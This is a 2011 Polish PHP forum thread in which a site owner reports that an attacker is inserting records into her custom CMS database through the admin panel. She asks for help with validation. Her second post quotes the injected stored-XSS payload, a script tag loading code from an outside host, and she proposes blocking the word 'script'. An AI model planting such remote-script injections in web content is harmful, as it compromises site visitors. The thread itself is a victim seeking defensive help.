Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> [inne]Jak to możliwe że ktoś umieścił swoje pliki na moim serwerze bez dostępu do ftp?
AniaR
post
Post #1





Grupa: Zarejestrowani
Postów: 92
Pomógł: 0
Dołączył: 6.05.2009
Skąd: warszawa

Ostrzeżenie: (0%)
-----

Jak to możliwe że ktoś umieścił swoje pliki na moim serwerze bez dostępu do ftp?
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
AniaR
post
Post #2





Grupa: Zarejestrowani
Postów: 92
Pomógł: 0
Dołączył: 6.05.2009
Skąd: warszawa

Ostrzeżenie: (0%)
-----

Haker wchodzi mi do panelu admina i dodaje do bazy jako kolejny rekord w tabeli taką teść:

<script src="http://www.manja.byethost6.com/balikita/noxss.php"></script>

Ten skrypt umieszczony w bazie już dalej robi swoje i zamiast wyswietlac strony wyswietla jakies gowno!!

Niestety funkcja czyszcząca clean ktora podałeś nie zabezpiecza przed wpisanie ma bazy ciagu znaków w postaci:

<script src="http://www.manja.byethost6.com/balikita/noxss.php"></script>

Zrobię sprawdzenie, ze jeżeli w ciągu znaków jest słowo script to ma nie przepościć...

A moze jest jakis inny sposob walidacji tego?
Go to the top of the page
+Quote Post

Posty w temacie
- AniaR   [inne]Jak to możliwe że ktoś umieścił swoje pliki na moim serwerze bez dostępu do ftp?   9.02.2011, 14:09:53
- - 1010   Może jakiś trojan? Lub też błędy w skryptach php. ...   9.02.2011, 14:11:34
- - AniaR   A jakiego typu mogą to być błędy w skryptach php?   9.02.2011, 14:24:45
- - amii   Używasz totalcommander ? Jeśli tak to zmień wszyst...   9.02.2011, 14:35:07
|- - sadistic_son   Przeleć dane z formularza funkcją strip_tags zanim...   10.02.2011, 19:14:50
|- - Hekko   Cytat(sadistic_son @ 10.02.2011, 20:14...   10.02.2011, 22:42:56
- - AniaR   Teraz zauważyłam ze to przekierowanie występuje ty...   9.02.2011, 14:56:59
- - Hekko   Dziurawy skrypt zatem, podrzucili Ci jakiś kod do ...   9.02.2011, 20:15:18
- - AniaR   Skrypty hakujące zostały dodane jako kolejne rekor...   10.02.2011, 13:59:33
- - Daiquiri   Nie wiem jak wygląda Twoja "strona", z j...   10.02.2011, 14:13:32
- - AniaR   Autorski cms.. Skorzystam z rady przeniesienia p...   10.02.2011, 14:21:43
- - amii   Może to atak typu SQL Injection 2. To akurat tylko...   10.02.2011, 15:15:22
- - AniaR   Haker wchodzi mi do panelu admina i dodaje do bazy...   10.02.2011, 19:12:39
- - Daiquiri   @sadistic_son - nic, jeżeli nie przechowuje się w ...   10.02.2011, 19:36:49

« Następny starszy · Przedszkole · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 9.12.2025 - 17:04
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn